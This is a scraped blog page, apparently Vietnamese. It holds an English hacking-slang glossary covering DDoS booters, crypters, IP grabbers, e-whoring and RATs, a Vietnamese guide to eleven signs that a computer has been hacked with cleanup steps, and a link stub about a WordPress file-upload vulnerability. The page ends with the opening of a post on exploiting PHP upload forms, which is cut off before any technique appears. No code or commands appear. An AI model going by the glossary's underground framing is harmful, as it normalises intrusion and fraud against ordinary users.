0 and 1.<br /> <br /> Black Hat =<br /> A hacker who performs illegal actions to do with hacking online. (Bad guy, per se)<br /> <br /> Blue Hat =<br /> A blue hat hacker is someone outside computer security consulting firms who is used to bug test a system prior to its launch, looking for exploits so they can be closed. Microsoft also uses the term BlueHat to represent a series of security briefing events.<br /> <br /> Bot =<br /> A piece of malware that connects computer to an attacker commonly using the HTTP or IRC protocal to await malicous instructions.<br /> <br /> Botnet =<br /> Computers infected by worms or Trojans and taken over by hackers and brought into networks to send spam, more viruses, or launch denial of service attacks.<br /> <br /> Buffer Overflow =<br /> A classic exploit that sends more data than a programmer expects to receive. Buffer overflows are one of the most common programming errors, and the ones most likely to slip through quality assurance testing.<br /> <br /> Cracker =<br /> A specific type of hacker who decrypts passwords or breaks software copy protection schemes.<br /> <br /> DDoS =<br /> Distributed denial of service. Flooding someones connection with packets. Servers or web-hosted shells can send packets to a connection on a website usually from a booter.<br /> <br /> Deface =<br /> A website deface is an attack on a site that changes the appearance of the site or a certain webpage on the site.<br /> <br /> Dictionary Attack =<br /> A dictionary attack is an attack in which a cyber criminal can attempt to gain your account password. The attack uses a dictionary file, a simple list of possible passwords, and a program which fills them in. The program just fills in every single possible password on the list, untill it has found the correct one. Dictionary files usually contain the most common used passwords.<br /> <br /> DOX =<br /> Personal information about someone on the Internet usualy contains real name, address, phone number, SSN, credit card number, etc.<br /> <br /> E-Whore =<br /> A person who manipulates other people to believe that he/she is a beautiful girl doing cam shows or selling sexual pictures to make money.<br /> <br /> Encryption = I<br /> n cryptography, encryption applies mathematical operations to data in order to render it incomprehensible. The only way to read the data is apply the reverse mathematical operations. In technical speak, encryption is applies mathematical algorithms with a key that converts plaintext to ciphertext. Only someone in possession of the key can decrypt the message.<br /> <br /> Exploit =<br /> A way of breaking into a system. An exploit takes advantage of a weakness in a system in order to hack it.<br /> <br /> FUD =<br /> Fully undetectable, can be used in many terms. Generally in combination with crypters, or when trying to infect someone.<br /> <br /> Grey Hat =<br /> A grey hat hacker is a combination of a Black Hat and a White Hat Hacker. A Grey Hat Hacker may surf the internet and hack into a computer system for the sole purpose of notifying the administrator that their system has been hacked, for example. Then they may offer to repair their system for a small fee.<br /> Hacker (definition is widely disputed among people...) = A hacker is someone who is able to manipulate the inner workings of computers, information, and technology to work in his/her favor.<br /> <br /> Hacktivist =<br /> A hacktivist is a hacker who utilizes technology to announce a social, ideological, religious, or political message. In general, most hacktivism involves website defacement or denial-of-service attacks.<br /> <br /> IP Address =<br /> On the Internet, your IP address is the unique number that others use to send you traffic.<br /> <br /> IP Grabber =<br /> A link that grabs someone's IP when they visit it.<br /> <br /> Keylogger =<br /> A software program that records all keystrokes on a computer's keyboard, used as a surveillance tool or covertly as spyware.<br /> Leach = A cultural term in the warez community referring to people who download lots of stuff but never give back to the community.<br /> <br /> LOIC/HOIC =<br /> Tool(s) used by many anonymous members to conduct DDoS attacks. It is not recommended to use these under any circumstances.<br /> <br /> Malware =<br /> Software designed to do all kinds of evil stuff like stealing identity information, running DDoS attacks, or soliciting money from the slave.<br /> <br /> Neophyte =<br /> A neophyte, "n00b", or "newbie" is someone who is new to hacking or phreaking and has almost no knowledge or experience of the workings of technology, and hacking.<br /> <br /> smith =<br /> Somebody new to a forum/game.<br /> <br /> OldFag =<br /> Somebody who's been around a forum/game for a long time.<br /> <br /> Packet =<br /> Data that is sent across the Internet is broken up into packets, sent individually across the network, and reassembled back into the original data at the other end.<br /> <br /> Phreak =<br /> Phone Freaks. Hackers who hack cell phones for free calling. Free Long distance calling. Etc.<br /> <br /> Phreaking =<br /> The art and science of cracking the phone network.<br /> <br /> Proxy =<br /> A proxy is something that acts as a server, but when given requests from clients, acts itself as a client to the real servers.<br /> <br /> Rainbow Table =<br /> A rainbow table is a table of possible passwords and their hashes. It is way faster to crack a password using rainbow tables then using a dictionary attack (Bruteforce).<br /> <br /> Remote Administration Tool =<br /> A tool which is used to remotely control (an)other machine(s). These can be used for monitoring user actions, but often misused by cyber criminals as malware, to get their hands on valuable information, such as log in credentials.<br /> <br /> Resolver =<br /> Software created to get an IP address through IM (instant messenger, like Skype/MSN) programs.<br /> <br /> Reverse Engineering =<br /> A technique whereby the hacker attempts to discover secrets about a program. Often used by crackers, and in direct modifications to a process/application.<br /> <br /> Root =<br /> Highest permission level on a computer, able to modify anything on the system without restriction.<br /> <br /> Rootkit (ring3 ring0) =<br /> A powerful exploit used by malware to conceal all traces that it exists. Ring3 - Can be removed easily without booting in safemode. Ring0 - Very hard to remove and very rare in the wild, these can require you to format, it's very hard to remove certain ring0 rootkits without safemode.<br /> <br /> Script Kiddie =<br /> A script kid, or skid is a term used to describe those who use scripts created by others to hack computer systems and websites. Used as an insult, meaning that they know nothing about hacking.<br /> <br /> Shell =<br /> The common meaning here is a hacked web server with a DoS script uploaded to conduct DDoS attacks via a booter. OR A shell is an script-executing unit - Something you'd stick somewhere in order to execute commands of your choice.<br /> <br /> Social Engineer =<br /> Social engineering is a form of hacking that targets people's minds rather than their computers. A typical example is sending out snail mail marketing materials with the words "You may already have won" emblazoned across the outside of the letter. As you can see, social engineering is not unique to hackers; it's main practitioners are the marketing departments of corporations.<br /> <br /> Spoof =<br /> The word spoof generally means the act of forging your identity. More specifically, it refers to forging the sender's IP address (IP spoofing). (Spoofing an extension for a RAT to change it from .exe to .jpg, etc.)<br /> <br /> SQL Injection =<br /> An SQL injection is a method often used to hack SQL databases via a website, and gain admin control (sometimes) of the site. You can attack programs with SQLi too.<br /> <br /> Trojan =<br /> A Trojan is a type of malware that masquerades as a legitimate file or helpful program with the ultimate purpose of granting a hacker unauthorized access to a computer.<br /> <br /> <b>VPS =</b><br /> The term is used for emphasizing that the virtual machine, although running in software on the same physical computer as other customers' virtual machines, is in many respects functionally<br /> equivalent to a separate physical computer, is dedicated to the individual customer's needs, has the privacy of a separate physical computer, and can be configured to run server software.<br /> <br /> <b>Warez =</b><br /> Software piracy<br /> <br /> <b>White Hat =</b><br /> A "white hat" refers to an ethical hacker, or a computer security expert, who specializes in penetration testing and in other testing methods to ensure the security of a businesses information systems. (Good guy, per se)<br /> <br /> <b>Worm =</b><br /> Software designed to spread malware with little to no human interaction.<br /> <br /> <b>Zero Day Exploit =</b><br /> An attack that exploits a previously unknown vulnerability in a computer application, meaning that the attack occurs on "day zero" of awareness of the vulnerability. This means that the developers have had zero days to address and patch the vulnerability.<br /> <br /> <b>Capuchino - VHB Group</b>

Một vài thuật ngữ hacking

★ DDoS = Distributed Denial of Service ★ DrDoS = Distributed Reflected Denial of Service Attack, uses a list of reflection servers or other methods such as DNS to spoof an attack to look like it's c…

Đọc thêm »

Cách nhận biết máy tính của bạn có bị hack hay không

<table border="0" cellpadding="8" cellspacing="0" class="tborder"><tbody> <tr><td id="posts_container"> <div id="posts"> <a href="https://www.blogger.com/null" id="pid252" name="pid252"></a> <div class="post " id="post_252"> <span class="post_date"><span class="post_edit" id="edited_by_252"></span></span> <div class="post_content"> <div class="post_body scaleimages" id="pid_252"> <span style="font-weight: bold;">Chỉ cần dựa vào những dấu hiệu lạ xuất hiện trong quá trình sử dụng máy tính, bạn có thể biết được máy của bạn đã và đang bị tấn công để tìm cách khắc phục ngay.</span><br /> <br /> <br /> Trong bức tranh bảo mật hiện nay, mọi thiết bị đều có nguy cơ bị tấn công với nhiều cách thức phức tạp và tinh vi đến mức khó nhận biết. Những phần mềm chống và diệt virus thực tế chỉ giúp chúng ta an tâm phần nào chứ không giúp cho hệ thống, thông tin, dữ liệu của bạn chắc chắn được an toàn tuyệt đối.<br /> <br /> Trong thực tế, việc quét mã độc (malware) toàn hệ thống đôi khi mang lại kết quả không chính xác, đặc biệt là thời gian quét ngắn, khoảng thời gian giữa những lần quét không hợp lý. Lý do rất đơn giản, tin tặc và những phần mềm độc hại do chúng tạo ra hiện “biến hóa khôn lường”, liên tục thay đổi chiến thuật cho phù hợp với từng thời điểm. Thậm chí, chỉ cần một thay đổi nhỏ chỉ vài byte trong bên trong mã độc cũng khiến cho những chương trình phát hiện virus khó có thể phát hiện ra.<br /> <br /> Các hãng bảo mật hiện nay cũng có phương pháp để chống lại điều này, nhiều chương trình chống malware có khả năng theo dõi trạng thái và hành vi của các mã độc bị phát hiện, từ đó có thể dự đoán được những biến thể khác của các chương trình nguy hiểm có thể sẽ xuất hiện trong tương lai. Một số chương trình khác sử dụng môi trường ảo hóa, giám sát hệ thống, phát hiện sự bất thường của lưu lượng mạng và tổng hợp những yếu tố này để có được những dự đoán chính xác hơn. Mặc dù vậy, với những thủ đoạn mới của hacker, đôi khi những cách này không hiệu quả và dễ dàng bị chúng qua mặt.<br /> <br /> Một khi những chương trình chống tấn công trở nên không mấy tác dụng thì bạn có thể dựa vào những dấu hiệu, triệu chứng lạ của thiết bị để từ đó có những cách giải quyết, khắc phục hay ít nhất cũng ngăn chặn chúng tấn công vào những thông tin, dữ liệu nhạy cảm. Trong mọi trường hợp, các chuyên gia bảo mật khuyên rằng, tốt nhất là nên khôi phục lại hệ thống hoặc cài mới hệ điều hành. Đối với một số dòng máy tính, chỉ cần một thao tác Restore là xong. Đây là một lời khuyên đúng đắn, vì khi một máy tính bị nhiễm sẽ không thể tin tưởng được, dù được quét đi quét lại bằng những công cụ bảo mật.<br /> <br /> Những dấu hiệu sau đây sẽ giúp bạn biết được hệ thống máy tính của mình chắc chắn đã bị tấn công và cách xử lý cho phù hợp với từng tình huống.<br /> <br /> <span style="font-weight: bold;">Dấu hiệu thứ 1: Thông báo của trình chống virus giả</span><br /> <br /> Thủ đoạn này đã xuất hiện từ lâu, nhưng cách làm ngày càng tinh vi hơn. Khi máy tính của bạn đã bị tấn công sẽ xuất hiện một chương trình (thường là giao diện web dạng pop-up) hiện ra với thông báo máy tính đang bị xâm nhập và gặp nguy hiểm. Hiện tại đa phần đều có thể biết những thông báo này là giả mạo, nếu làm theo sẽ nguy hiểm, nhưng cũng không ít người ngây thơ, vội vàng làm theo để máy không bị nhiễm virus. Nhưng thực tế việc nhấn vào những cửa sổ này là đã vô tình “rước giặc vào nhà”.<br /> <br /> <div style="text-align: center;"> <img alt="" class="attachment" src="http://vnnict.com/attachment.php?aid=2" />    <br /> <br /> <br /> <div style="text-align: left;"> <div style="text-align: center;"> Làm theo những thông báo giả, bạn sẽ tải về những chương trình nguy hiểm giả mạo tiện ích antivirus.<br /> <br /> <br /> <div style="text-align: left;"> Bạn sẽ nghĩ, chỉ cần nhấn Cancel hoặc tắt cái thông báo giả đó đi là máy tính an toàn. Điều này là sai lầm, vì đa phần những cảnh báo này được thực hiện dựa trên những tiện ích đang bị lỗ hổng và chưa được cập nhật, thường là Java Runtime Environment hoặc các plug-in của Adobe như Flash Player hay Adobe Reader.</div> <div class="thx_list hide" id="thx_list252"> Dùng chiêu thông báo giả làm mồi nhử để người dùng tải về những ứng dụng độc trước đây thường là để dụ mua phần mềm, phát tán quảng cáo thì hiện tại được hacker khai thác để trộm thông tin thanh toán, thẻ tín dụng. Tin tặc sẽ có những thủ thuật để kiểm soát hoàn toàn hệ thống và thu thập toàn bộ các thông tin liên quan đến tín dụng, ngân hàng.<br /> <br /> Cách xử lý: Ngay khi nhận được thông báo giả về tình trạng máy bị nhiễm virus, bạn hãy nhanh chóng tắt máy tính ngay. Bạn cần quan sát kỹ các dấu hiệu để không bị nhầm, vì các thông báo giả được thiết kế rất giống với thông báo thật của các trình antivirus.<br /> Sau khi tắt máy tính, bạn tiếp tục khởi động lại máy, nhấn F8 sau khi qua màn hình boot để vào Safe mode để tìm và gỡ bỏ ứng dụng hoặc add-on, plug-in hay extension đã vô tình cài đặt. Việc tìm ứng dụng độc hại đòi hỏi phải tinh ý và cần chút kinh nghiệm vì rất dễ xóa nhầm các ứng dụng khác.<br /> <br /> Sau khi xóa thành công, bạn hãy dùng máy tính và theo dõi xem các thông báo có còn xuất hiện hay không, nếu chúng vẫn xuất hiện thì bạn dùng một trình antivirus như Trend Micro, AVG, Kaspersky… cập nhật cơ sở dữ liệu mới nhất và quét. Nếu vẫn không tiêu diệt được thì bạn nên cài lại hoặc khôi phục lại hệ điều hành về thời điểm an toàn nhất.<br /> <br /> <span style="font-weight: bold;">Dấu hiệu thứ 2: Xuất hiện thanh công cụ lạ</span><br /> <br /> Trình duyệt tự dưng có rất nhiều thanh công cụ (toolbar) mặc dù bạn chưa từng cài. Đó là dấu hiệu thứ 2 cho biết máy tính đã bị tấn công.<br /> <br /> <br /> <br /> <br /> <div style="text-align: center;"> <img alt="" class="attachment" src="http://vnnict.com/attachment.php?aid=3" />    <br /> <br /> Hàng chục thanh công cụ tự động cài trên Internet Explorer của một máy tính.<br /> <br /> <br /> <br /> <br /> <div style="text-align: left;"> Cách xử lý: Hầu hết những trình duyệt cho phép người dùng duyệt trước và kích hoạt các thanh công cụ muốn dùng. Chỉ cần nhấn chuột phải lên thanh toolbar của trình duyệt và bỏ chọn những thanh công cụ giả mạo. Để cho chắc chắn, bạn nên gỡ bỏ hoàn toàn. Đối với Internet Explorer, bạn hãy vào Control Panel > Uninstall program và chọn thanh công cụ giả mạo và gỡ bỏ đi là xong. Với Firefox thì bạn gỡ bỏ trong phần Addons, Chrome thì thao tác ở mục Extensions.</div> <br /> <div style="text-align: left;"> Có các thanh công cụ “cứng đầu, không thể gỡ bỏ theo cách thông thường thì bạn hãy dùng cách sau. Ghi lại tên toolbar “lạ” và tìm trên các công cụ tìm kiếm từ khóa “X toolbar + removal tool” (với X là tên thanh công cụ).</div> <br /> <div style="text-align: left;"> Một lưu ý nhỏ là khi cài đặt các ứng dụng, như trình duyệt hay các trình download, bạn nên đọc kỹ từng bước và bỏ chọn hoặc không đồng ý những điều khoản trong các bước cài thêm các ứng dụng bổ sung để không vô tình cài phải các công cụ không mong muốn. Chẳng hạn, khi cài phần mềm uTorrent, thường có bước yêu cầu bạn cài thêm thanh công cụ Ask hay một tên nào khác, chỉ cần bỏ chọn hoặc không đồng ý với điều khoản cài đặt là ứng dụng không thể vào máy tính được. Với những tình huống vô tình cài phải các thanh công cụ hoặc phần mềm độc hại là do chính bạn không đọc kỹ mà muốn cài cho nhanh bằng cách nhấn Next > Next cho đến khi Finish.</div> <br /> <div style="text-align: left;"> <span style="font-weight: bold;">Dấu hiệu thứ 3: Kết quả tìm kiếm hiển thị ở một trang “lạ”</span></div> <br /> <div style="text-align: left;"> Một khi đã xâm nhập vào máy tính của bạn, hacker sẽ tìm cách khai thác tối đa những hành vi của người dùng để thu thập thông tin. Một trong những cách đơn giản nhưng hiệu quả là chúng cho ra những kết quả tìm kiếm hiển thị ở một trang lạ, khi người dùng nhấn vào các kết quả thì sẽ chuyển đến những trang độc hại, mặc dù người dùng tìm kiếm với Google hay bất cứ công cụ tìm kiếm nào. Những trang mà chúng chuyển tới có thể sẽ dụ bạn thực hiện những khảo sát nhằm mục đích nào đó để nhận những phần quà giá trị cao, tải ứng dụng miễn phí với nhiều chức năng hấp dẫn hay mua hàng giá rẻ để thu thập thông tin thanh toán trực tuyến…</div> </div> <br /> <div style="text-align: center;"> <img alt="" class="attachment" src="http://vnnict.com/attachment.php?aid=4" />    <br /> Kiểm soát lưu lượng mạng là cách để xác định chắc chắn máy tính đang bị tấn công.</div> <br /> Khi có dấu hiệu khả nghi về các kết quả tìm kiếm và trình duyệt chuyển đến, nhiều người đã kiểm tra cùng một từ khóa đó ở một máy tính hay điện thoại khác, xem kết quả liệt kê có giống nhau không. Đó là một cách làm hiệu quả, nhưng cũng có thể máy tính kia cũng đã bị nhiễm virus. Các chuyên gia kỹ thuật có thể khẳng định chắc chắn máy tính có bị tấn công hay không khi có dấu hiệu lạ bằng cách giám sát lưu lượng băng thông. Thường khi trình duyệt bị tấn công, lưu lượng gửi đi và trả về lớn hơn rất nhiều so với một máy tính an toàn.<br /> <br /> Cách xử lý: Thực hiện các bước tương tự như ở dấu hiệu thứ 2 để gỡ bỏ những công cụ tìm kiếm nguy hiểm.<br /> <br /> <span style="font-weight: bold;">Dấu hiệu thứ 4: Xuất hiện liên tục các pop-up</span><br /> Những triệu chứng phổ biến cho dấu hiệu này là bạn thực sự rất phiền phức với nhiều cửa sổ với nhiều nội dung từ quảng cáo, chứa banner khiêu dâm cho đến yêu cầu tải phần mềm miễn phí giả mạo… xuất hiện trên màn hình. Thông thường, số lượng pop-up xuất hiện không cố định mà rất ngẫu nhiên, số lần cũng vậy. Có khi hơn 30 phút, bạn không thấy pop-up nào, nhưng cũng có khi chỉ trong 1 phút bạn nhận được cả chục pop-up.<br /> <br /> <br /> <div style="text-align: center;"> <img alt="" class="attachment" src="http://vnnict.com/attachment.php?aid=5" />    <br /> <br /> Pop-up xuất hiện dày đặt trên màn hình máy tính là dấu hiệu chắn chắn là hệ thống đang bị tấn công.<br /> <br /> <br /> <div style="text-align: left;"> Thường những pop-up dạng này miễn nhiễm với các công cụ chống pop-up, dù bạn có cài các công cụ hỗ trợ chặn cũng không tác dụng. Chắc chắn các nội dung trên cửa sổ pop-up sẽ dẫn đến các trang độc hại, tần số và số lượng xuất hiện cũng nhằm khiến bạn phải vô tình nhấn nhầm và chúng đạt được mục đích.</div> <br /> <div style="text-align: left;"> Cách xử lý: Ngoài cách gỡ bỏ những công cụ, phần mềm cài gần nhất gây ra hiện tượng xuất hiện pop-up thì bạn nên quét hệ thống bằng các công cụ diệt virus. Nếu vẫn không khắc phục được thì tốt nhất hãy khôi phục hệ thống về thời điểm tốt nhất để đảm bảo an toàn cho thông tin và dữ liệu.</div> <br /> <div style="text-align: left;"> <span style="font-weight: bold;">Dấu hiệu thứ 5: Người thân nhận được email hoặc tin nhắn giả mạo tài khoản của bạn</span></div> <br /> <div style="text-align: left;"> Phương thức gửi email chứa nội dung dẫn tới trang chứa mã độc đến toàn bộ danh sách địa chỉ liên hệ trong Contacts thường được hacker sử dụng để phát tán malware. Hiện tại, đa phần những nội dung email do hacker gửi đi từ chính địa chỉ email của nạn nhân thường chứa một đường link với lời mời mọc hấp dẫn. Trước đây, kẻ tấn công thường chèn một hoặc nhiều tập tin đính kèm vào thẳng email, nhưng cách này hiện tại không hiệu quả vì tường lửa và những trình antivirus mới có thể quét và xóa sạch.</div> </div> <br /> <div style="text-align: center;"> <a class="highslide" href="http://www.pcworld.com.vn/files/articles/2014/1236378/2-182.jpg" rel="nofollow"><img border="0" src="http://www.pcworld.com.vn/files/articles/2014/1236378/2-182.jpg" style="max-width: 300px;" /></a></div> <br /> <div style="text-align: center;"> Hacker dùng email của bạn để phát tán virus qua thư điện tử.</div> <br /> <br /> Hacker hiện tại cũng khai thác những lợi thế của các mạng xã hội, nhất là Facebook để phát tán mã độc. Một khi đã chiếm được quyền kiểm soát tài khoản Facebook, kẻ tấn công có thể dùng công cụ để gửi tin nhắn, cập nhật trạng thái mới với đường link chứa malware đến tường hoặc hộp thư, tin nhắn của các tài khoản có trong danh sách bạn của nạn nhân. Các trình antivirus hiện tại cũng bổ sung tiện ích nhằm chống lại những cách phát tán dạng này, nhưng kẻ tấn công luôn thay đổi cách thức tấn công trên mạng xã hội nhằm thoát khỏi sự kiểm soát của trình chống virus.<br /> <br /> Cách xử lý: Ngay lập tức sau khi nhận được thông tin về việc nhận được email chứa mã độc từ bạn bè, bạn hãy nhanh chóng quét virus cho máy tính, đổi mật khẩu cho tài khoản email hay mạng xã hội. Kích hoạt chức năng xác thực 2 bước nhằm đảm bảo tính bảo mật cho tài khoản email, tham khảo thêm cách kích hoạt bảo mật 2 bước cho Gmail tại <a href="http://www.pcworld.com.vn/T1235742" rel="nofollow" target="_blank">www.pcworld.com.vn/T1235742</a>.<br /> <br /> <br /> <span style="font-weight: bold;">Dấu hiệu thứ 6: Mật khẩu của tài khoản trực tuyến đột ngột bị thay đổi</span><br /> <br /> Nếu một hay nhiều mật khẩu của tài khoản email, mạng xã hội… của bạn bất ngờ bị thay đổi thì chắc chắn các tài khoản này đã bị hack. Nhiều nguyên nhân xuất phát từ việc người dùng làm theo những email giả mạo hướng dẫn thay đổi mật khẩu, từ đó tạo điều kiện cho hacker chiếm quyền những tài khoản khác.<br /> <br /> <br /> <div style="text-align: center;"> <a class="highslide" href="http://www.pcworld.com.vn/files/articles/2014/1236378/image-update-img.jpg" rel="nofollow"><img border="0" src="http://www.pcworld.com.vn/files/articles/2014/1236378/image-update-img.jpg" style="max-width: 300px;" /></a></div> <br /> <div style="text-align: center;"> Cần lấy lại quyền kiểm soát tài khoản ngân hàng khi bị hacker tấn công.</div> <br /> Cách xử lý: Trước tiên, bạn hãy tìm cách thông báo đến bạn bè, đối tác, người thân tình trạng tài khoản của mình đã bị hack và khuyên họ đừng làm theo những gì mà hacker dùng tài khoản của mình để dụ dỗ. Tiếp theo, hãy tìm cách lấy lại mật khẩu bằng công cụ “Quên mật khẩu” trên các dịch vụ trực tuyến. Một lần nữa, chức năng xác thực 2 bước cần được kích hoạt để đảm bảo an toàn cho các tài khoản của bạn.<br /> <br /> <span style="font-weight: bold;">Dấu hiệu thứ 7: Máy tính tự cài những phần mềm lạ</span><br /> <br /> Máy tính tự động cài những phần mềm không mong muốn mặc dù người dùng cố gắng nhấn nút Hủy (Cancel) và không thể nào gỡ bỏ được, là dấu hiệu tiếp theo cho thấy máy tính đã bị tấn công.<br /> <br /> <br /> <div style="text-align: center;"> <a class="highslide" href="http://www.pcworld.com.vn/files/articles/2014/1236378/autoruns-1.png" rel="nofollow"><img border="0" src="http://www.pcworld.com.vn/files/articles/2014/1236378/autoruns-1.png" style="max-width: 300px;" /></a></div> <br /> <div style="text-align: center;"> Sử dụng các công cụ chuyên dụng để tìm những ứng dụng ẩn tự cài đặt.</div> <br /> Nhiều trường hợp máy tính được cài trình chống virus nhưng những phần mềm độc hại tự cài vẫn “qua mặt” được vì hacker có khả năng tạo ra những giấy phép giả những hãng phần mềm lớn. Để những phần mềm này có thể nằm trên máy và tự cài được thì trước đó, có một mã độc (thường là trojan) đã xâm nhập vào hệ thống và thực thi những lệnh từ hacker để tải các gói phần mềm khác để phục vụ mục đích của mình.<br /> Cách xử lý: Với thủ đoạn “luồn lách” mới của hacker thì chức năng gỡ bỏ phần mềm tích hợp của Windows không còn hiệu quả nữa. Bạn phải dùng đến những công cụ mạnh hơn, chẳng hạn như Autoruns (<a href="http://download.sysinternals.com/files/Autoruns.zip" rel="nofollow" target="_blank">http://download.sysinternals.com/files/Autoruns.zip</a>). Tiện ích này có thể hiển thị toàn bộ những phần mềm đã cài trên hệ thống, kể cả những phần mềm được hacker ẩn danh mà tiện ích Uninstall Programs của Windows không thể nhận ra. Bạn có thể vô hiệu các tiến trình và ứng dụng lạ và khởi động lại máy tính, sau đó hãy gỡ bỏ chúng ra khỏi hệ thống.<br /> <br /> <br /> <span style="font-weight: bold;">Dấu hiệu thứ 8: Con trỏ chuột chạy lung tung và dừng lại đúng mục tiêu chỉ định của hacker</span><br /> <br /> Nếu con trỏ chuột trên máy tính của bạn không thể điều khiển được, mà nó tự chạy và cuối cùng dừng lại ở một tùy chọn nào đó được định sẵn, rất chính xác thì chắc chắn máy tính đã bị tấn công.<br /> <br /> <br /> <br /> <div style="text-align: center;"> <a class="highslide" href="http://www.pcworld.com.vn/files/articles/2014/1236378/hacking.jpg" rel="nofollow"><img border="0" src="http://www.pcworld.com.vn/files/articles/2014/1236378/hacking.jpg" style="max-width: 300px;" /></a></div> <br /> <br /> Cách xử lý: Bạn cần ngắt kết nối mạng ngay lập tức khi có dấu hiệu này, vì rất có thể máy tính đang được điều khiển từ xa bằng một công cụ nào đó do hacker tạo ra. Sau đó, dùng một máy tính an toàn để kiểm tra lại xem các tài khoản thanh toán, ngân hàng có được an toàn không và thay đổi mật khẩu ngay. Cuối cùng, hãy cài lại máy tính hoặc khôi phục hệ thống về nguyên bản của nhà sản xuất.<br /> <br /> <span style="font-weight: bold;">Dấu hiệu thứ 9: Các chương trình chống virus, Task Manager, Registry Editor bị vô hiệu hóa</span><br /> <br /> Đây là những cách cần thiết và cơ bản nhất để chiếm quyền điều khiển một máy tính của mọi hacker. Khi bị vô hiệu hóa, các trình antivirus, Task Manager hay Registry Editor không thể khởi chạy được, các tùy chọn liên quan sẽ bị mờ. Lúc này, hacker tha hồ lộng hành trên máy tính của bạn mà không sợ bị ngăn chặn.<br /> <br /> <br /> <div style="text-align: center;"> <a class="highslide" href="http://www.pcworld.com.vn/files/articles/2014/1236378/image43.png" rel="nofollow"><img border="0" src="http://www.pcworld.com.vn/files/articles/2014/1236378/image43.png" style="max-width: 300px;" /></a></div> <br /> <div style="text-align: center;"> Task Manager hay những công cụ hệ thống khác bị vô hiệu cho biết bạn đã mất quyền kiểm soát máy tính.</div> <br /> <br /> Cách xử lý: Có nhiều công cụ để kích hoạt lại các công cụ Task Manager hay Registry Editor mà bạn có thể thấy trên các kết quả từ các công cụ tìm kiếm, nhưng cách này không giải quyết triệt để. Virus, mã độc vẫn còn trên máy tính và ngày càng phát tán rộng rãi hơn. Do đó, cách tốt nhất vẫn là khôi phục hoặc cài lại hệ điều hành.<br /> <br /> <span style="font-weight: bold;">Dấu hiệu thứ 10: Tài khoản ngân hàng bị mất tiền</span><br /> <br /> Đến lúc phát hiện tài khoản ngân hàng của bạn bị hao hụt là hacker đã đạt được mục đích, những thông tin cần thiết để thực hiện một giao dịch đã bị chúng chiếm giữ.<br /> <br /> Cách xử lý: Nhanh chóng liên hệ với ngân hàng hay các dịch vụ thanh toán để yêu cầu khóa tài khoản và thực hiện các thủ tục cần thiết để lấy lại thông tin tài khoản. Sau đó, hãy reset (cài lại) toàn bộ những thiết bị có thực hiện giao dịch trước đó và chứa thông tin tài khoản ngân hàng, từ máy tính, smartphone đến máy tính bảng.<br /> <br /> <br /> <div style="text-align: center;"> <a class="highslide" href="http://www.pcworld.com.vn/files/articles/2014/1236378/growth-hacker.jpg" rel="nofollow"><img border="0" src="http://www.pcworld.com.vn/files/articles/2014/1236378/growth-hacker.jpg" style="max-width: 300px;" /></a></div> <br /> <br /> <span style="font-weight: bold;">Dấu hiệu thứ 11: Nhận được cuộc gọi về những đơn đặt hàng</span></div> <div class="thx_list hide" id="thx_list252"> <br /><div style="text-align: left;"> Hacker đã có được thông tin tài khoản thanh toán của bạn nhưng chưa thể trả tiền để mua hàng, các cửa hàng hoặc dịch vụ bán hàng qua mạng phải gọi điện xác nhận trước khi thanh toán. Bạn cần tỉnh táo để không bị mất tiền vì những món đồ không phải do mình đặt mua.<br /><br /> Cách xử lý: Hủy các đơn hàng đã đặt với thông tin thanh toán của bạn, nhờ sợ can thiệp của cơ quan chức năng để được bảo vệ. Sau đó, nhanh chóng đổi mật khẩu cho các tài khoản thanh toán trực tuyến, ngân hàng.</div> <br /> <div style="text-align: left;"> Nguồn: http://vnnict.com/thread-249.html</div> <span style="font-weight: bold;"></span><span class="smalltext thx_list_lable"></span><span id="thx_entry252"></span> </div> </div> </div> </div> </div> </div> <div class="post_controls"> </div> </div> </div> </td></tr> </tbody></table>

Cách nhận biết máy tính của bạn có bị hack hay không

Chỉ cần dựa vào những dấu hiệu lạ xuất hiện trong quá trình sử dụng máy tính, bạn có thể biết được máy của bạn đã và đang bị tấn công để tìm cách khắc phục ngay. Trong bức tranh bảo mật hiện nay, m…

Đọc thêm »

WordPress PHP Event Calendar 1.5 Arbitrary File Upload Vulnerability | Security - Bảo mật website

<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="http://farm9.staticflickr.com/8817/16415748833_48464f5fba_o.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="http://farm9.staticflickr.com/8817/16415748833_48464f5fba_o.png" width="320" /></a></div> <br /> <br /> <br /> <a href="http://vnnict.com/thread-180.html#.VSCM-bmpR48.blogger">Bấm vào đây để xem bài:  WordPress PHP Event Calendar 1.5 Arbitrary File Upload Vulnerability | Security - Bảo mật website</a>

WordPress PHP Event Calendar 1.5 Arbitrary File Upload Vulnerability | Security - Bảo mật website

Bấm vào đây để xem bài:  WordPress PHP Event Calendar 1.5 Arbitrary File Upload Vulnerability | Security - Bảo mật website…

Đọc thêm »

Exploiting PHP Upload forms

<span class="" id="result_box" lang="vi"><span class="hps">Hôm nay tôi</span> <span class="hps">muốn</span> <span class="hps">gửi về các</span> <span class="hps">lỗi</span> <span class="hps">gần đây</span> <span class="hps">nhất mà tôi</span> <span class="hps">đã tìm thấy trong</span> <span class="hps">PHP</span>, <span class="hps">CVE</span><span class="atn">-</span><span class="">2015-2348</span>. <span class="hps">Lỗi này là</span> <span class="hps">khá</span> <span class="hps">quan trọng </span></span><span class="" id="result_box" lang="vi"><span class="hps atn">(</span><span class="">xem xét số lượng</span> <span class="hps">của</span> <span class="hps">các nhà phát triển</span> <span class="hps">bị ảnh hưởng)</span><span class="">.</span></span><br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4iK_3Tw4hvFKUpUWEyNoM6RlaFYNKOfXSsRxzsqcZPqpzSbY28RcKZNnmObFmoWXQCvzoH4pONjttDrsTC0ngaa1Ih1GjA5zYgmZtwPxlFiTHxdeTni-NmbE3SDhg_qITBQKtE3h5CPIK/s1600/php-bug.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4iK_3Tw4hvFKUpUWEyNoM6RlaFYNKOfXSsRxzsqcZPqpzSbY28RcKZNnmObFmoWXQCvzoH4pONjttDrsTC0ngaa1Ih1GjA5zYgmZtwPxlFiTHxdeTni-NmbE3SDhg_qITBQKtE3h5CPIK/s1600/php-bug.jpg" /></a></div> <br /> <br /> <span class="" id="result_box" lang="vi"><span class=""><span class="" id="result_box" lang="vi"><span class="hps">Vấn đề xảy ra</span> <span class="hps">trong</span> <span 